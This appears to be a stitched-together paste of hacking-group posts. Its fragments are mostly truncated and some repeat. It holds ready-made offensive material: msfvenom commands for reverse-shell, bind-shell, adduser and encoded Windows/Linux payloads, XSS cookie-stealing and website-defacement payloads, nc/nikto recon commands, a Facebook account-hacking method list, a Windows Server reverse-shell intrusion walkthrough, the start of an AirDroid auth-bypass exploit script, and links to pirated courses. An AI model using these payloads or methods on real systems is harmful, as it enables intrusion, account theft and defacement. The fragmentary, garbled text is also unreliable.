All About Hacking & Cybersecurity

https://ghostbin.com/paste/ bjywz

A.K.A. X: Penetration | https://drive.google.com/drive/folders/0B4Ps0vkyD9p5N3RPSFVDdTRDQkk

How to Become a Hacker --------------------------------- 1. Learn TCP/IP, Basic Information gathering, Proxies, Socks, SSL, VPN, VPS, RDP, FTP, POP3, SMTP, Telnet, SSH. 2. Learn Linux, Unix, Windows - You can do this using vmware or any virtual desktop utility. 3. Learn a programming language that's compatible with all OS - Perl, Python, C . 4. Learn HTML, PHP, Javascript, ASP, XML, SQL, XSS, SQLI, RFI, LFI 5. Learn Reverse engineering and crack some programs for serials easy ones like mirc, winzip, winrar or old games. 6. Code a fuzzer for common protocols - ftp, pop3, 80, 8080 - Pick some free software like ftp server, mail server, apache or iis webserver or a webserver all-in-one pack, or teamspeak, ventrilo, mumble. 7. Code a tool that uses grep to sort out unique code in source codes. 8. Make a custom IPtable, IPsec firewall that blocks all incoming traffic and out going traffic and add filters to accept certain ports that your software or scripts use. 9. Pick a kern

CCNA:- http://www.birminghamcharter.com/ourpages/auto/2012/3/22/41980164/CCNA%20Electronic%20Book%206th%20edition.pdf CCNP:- http://dl2.cbtnet.ir/books/wp-content/uploads/2015/07/CCNP-ROUTE.pdf CCIE:- https://docstore.mik.ua/cisco/pdf/CCIE-Cisco-Certified-Internetwork-Expert-Study-Guide---SYBEX---John-Swartz,-Todd-Lammle.pdf

WAYS FACEBOOK ACCOUNT CAN BE HACKED (repost) 1= Social engineering 2= Phishing 3= Keylogging 4= Bypass security questions 5= Password Stealers 6= Brute force attack 7= Session Hijacking 8= DNS spoofing 9= Side jacking 10= Mobile phone hacking 11= Click jacking 12= Man in the middle attack 13= USB Theft 14= Cookies Grabbing 15= Botnet 16= Likes jacking 17= Dictionary attack 18= Exploiting Facebooks Three Trusted friend feature NOTE : this is not going to be explained, interested peeps should read about it. Thanks 😊

Shakaal ™: May be of help just sharing if someone is new Learning Linux ( A2Z) Most of us are trying to learn Linux but we fail due to no direction to follow. Here is an directions to follow and learn Linux. ## Basics ## 1. Introduction to Linux -- http://bit.ly/Introcudtion_to_Linux 2. Linux Architecture -- http://bit.ly/Linux_Architecture 3. Windows Vs Linux Comparision -- http://bit.ly/Windows_Vs_Linux 4. Bash Shell features -- http://bit.ly/bash_shell 5. Linux Directory Structure -- http://bit.ly/Linux_Directory_structure 6. Linux Boot Process Detailed explanation - http://bit.ly/LinuXboot_process 7. Basic and Common Commands - http://bit.ly/Basicommands 8. All Linux Commands with there description - http://bit.ly/Linux_commands 25 Linux commands - http://bit.ly/29ZhNDn #### System Administration Topics ## 9. Linux Text Editors - http://bit.ly/Text_Editors 10. Linux Operating System Installation - http://bit.ly/Linux_OS_Installation 11. User Profile Management - ht

/\ / \ _ __ ___ _ __ _ _ _ __ ___ ___ _ _ ___ / /\ \ | '_ \ / _ \| '_ \| | | | '_ ` _ \ / _ \| | | / __| / ____ \| | | | (_) | | | | |_| | | | | | | (_) | |_| \__ \ /_/ \_\_| |_|\___/|_| |_|\__, |_| |_| |_|\___/ \__,_|___/ __/ | |___/ Courses pirated & dumped by Case & S1rlancelot irc.anonops.com/6697 #learninghub * This series of videocourses will guide you through the core material that an entry-level "ethical" hacker needs. * Go to pluralsight.com (most links here are from there) and search the course if you want to see the table of contents. * You may want to use a media player that allows you to increase the speed of the videos * The number does not mean the order in which you should follow the courses, its just the order in which they were added. * Use ?desc <coursenumber> to check the description of a course. Eg: ?desc 81 * Special thanks to ClaudiaD who haxed her way and made downloading the videos a lot easier, you rock. I also reused the

HAX [powered by P2R]: How to prepare for OSCP complete guide Below are 5 skills which you have to improve before registering for OSCP > Learn basic of Computer Network, Web application, and Linux > Learn Bash and Python scripting > Enumeration is key in OSCP lab, I repeat Enumeration is key in OSCP Lab and in real world too > Download vulnerable VM machines from vulnhub > Buffer Overflow (BOF) exploitation Below are the free reference before registration of OSCP > https://www.cybrary.it/course/ethical-hacking / > https://www.cybrary.it/course/web-application-pen-testing / > https://www.cybrary.it/course/advanced-penetration-testing / > https://www.offensive-security.com/metasploit-unleashed / > https://www.cybrary.it/course/python / Below are the reference for Buffer overflow and exploit developmet for OSCP > http://www.fuzzysecurity.com/tutorials/ expDev /1.html > https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-p

HAX [powered by P2R]: *How to Take Control of Windows Server 2003 Remotely by Launching a Reverse Shell* When I left off on our last hack, we had hacked into the ubiquitous Windows Server 2003 server by adding ourselves as a user to that system so that we can return undetected at any time. The problem with this approach is that a sysadmin who is on their toes will note that a new user has been added and will begin to take preventative action. I will duly note that in small organizations with a sysadmin who wears multiple hats, the chances of this happening is small in the near term, but certainly when they get around to reviewing their logs, will notice a new user—maybe. Fortunately for us, many of the sysadmins never get around to reviewing their log files until it's too late. In this new hack, we will attempt to put a command prompt on the Server 2003 that will allow us execute command remotely on the system. Remember in our previous hack when we added ourselves as a user? I

Top 10 Best Command Prompt (CMD) Tricks And Hacks 1. These commands will help you perform shutdown, restart or logoff operations with just one command. For Shut Down: shutdown -s For Restarting: shutdown -r For Logoff: shutdown -l 2. You can also shutdown your computer at a specified time by setting the time. Follow the command below. shutdown -s -t 120 3. You can print a message before you shutdown by using this command. This will be helpful to the user as a reminder or for leaving a message for the next person who will use the computer. shutdown -s -t 500 -c “i don’t want to work.” 4. We use a lot of application in our computer each with the different extension so remembering all those extensions can be hectic so use this command to check the extension of any application. Assoc 5. You can hide a folder with this command attrib +s +h D:honey In the above command honey is the name of folder, Now unhide the folder with this command attrib -s -h D:ABC 6. You can use config

Some Private Notes on Bug Hunting Aashish Kunvar Anon haxo: ########By dorkerdevil ##############                 Hope you like it #NavinYadav bro for u n for group                                                                                                                                                                                            Hack Notes echo -e "HEAD /HTTP/1.0\n\n" | nc -vv website.com echo -e "HEAD /HTTP/1.0\n\n" | openssl s_client -quit -connect website:443 nikto -p 80 -h website -verbose whisker2.1 -p 80 -h website enum all extensions: .asp,.aspx,.css,.htc,.htr,.htw,.ida,.idc,.idq,.printer,.shtm,.xml,.xsl previous version of pages:~ extensions: .bak,.old,.orig,.txt search for common directories such as:~ /bak,/inc,/old,/script SQL connection strings:~ db= dbconn= ~:xss payloads to check:~ <script>alert(document.cookie)</script> 1.attempt different embedding method: %3cscript%3e, %253cscript%253e, %00%3cscript%

Streaak: Bug bounty forum https://bugbountyforum.com/blog/ama/nahamsec / https://bugbountyforum.com/blog/ama/yaworsk / https://bugbountyforum.com/blog/ama/jstnkndy / https://bugbountyforum.com/blog/ama/itsecurityguard / https://bugbountyforum.com/blog/ama/avlidienbrunn / @irPentesters

JuanDeLemos: [Tutorial] How to deface website with Cross Site Scripting [Noobs]  Today i am gonna teach you how to deface the sites which has the XSS vulnerability . IMP NOTE : : Never implement this technique. I am just explaining it for educational purpose only. Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website to Hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..! i have some easiest methods to deface the Xss vuln sites .. i will be teaching u one by one . 1 - Script for changing the background Color of a website: <script>document.body.bgColor="red";</script> use this in your target website as http://www.targetwebsite.com /<script>document.body.bgColor="red";</script> 2 - Script for chaning the background image of a website: <script>document.body.background=&q

Listing payloads msfvenom -l Windows Paylaods Reverse Shell : msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe Bind Shell: msfvenom -p windows/meterpreter/bind_tcp RHOST= (IP Address) LPORT=(Your Port) -f exe > bind.exe Create User: msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe CMD shell: msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe Encoder: msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe One can also use the -a to specify the architecture or the --platform Linux Payloads Reverse Shell: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf >reverse.elf Bind Shell: msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf Generic Shell: msfvenom -p generic/shell_bind_tcp RHOST=(IP Address) LPORT=(

AirDroid Exploit:) import sys,requests,re,urllib2 def logo():  print"\t\t       .__           .___             .__    .___"  print"\t\t_____  |__|______  __| _/______  ____ |__| __| _/"  print"\t\t\__  \ |  \_  __ \/ __ |\_  __ \/  _ \|  |/ __ | "  print"\t\t / __ \|  ||  | \/ /_/ | |  | \(  <_> )  / /_/ | "  print"\t\t(____  /__||__|  \____ | |__|   \____/|__\____ | "  print"\t\t     \/               \/                      \/ "  print "\t\tAIRDROID VerAll UPLOAD AUTH BYPASS PoC @ Parsa Adib" if len(sys.argv)<6 or len(sys.argv)>6 :  logo()  print "\t\tUSAGE:python exploit.py ip port remote-file-name local-file-name remote-file-path"  print "\t\tEXAMPLE:python exploit.py 192.168.1.2 8888 poc poc.txt /sdcard" else :  logo()  print "\n[+]Reciving Details\n-----------------------------"  try :   p = requests.get('http://'+sys.argv[1]+':'+sys.

/\ / \ _ __ ___ _ __ _ _ _ __ ___ _ good one__ _ _ ___ / /\ \ | '_ \ / _ \| '_ \| | | | '_ ` _ \ / _ \| | | / __| / ____ \| | | | (_) | | | | |_| | | | | | | (_) | |_| \__ \ /_/ \_\_| |_|\___/|_| |_|\__, |_| |_| |_|\___/ \__,_|___/ __/ | |___/ Courses pirated & dumped by Case & S1rlancelot irc.anonops.com/6697 #learninghub * This series of videocourses will guide you through the core material that an entry-level "ethical" hacker needs. * Go to pluralsight.com (most links here are from there) and search the course if you want to see the table of contents. * You may want to use a media player that allows you to increase the speed of the videos * The number does not mean the order in which you should follow the courses, its just the order in which they were added. * Use ?desc <coursenumber> to check the description of a course. Eg: ?desc 81 * Special thanks to ClaudiaD who haxed her way and made downloading the videos a lot easier, you rock. I also r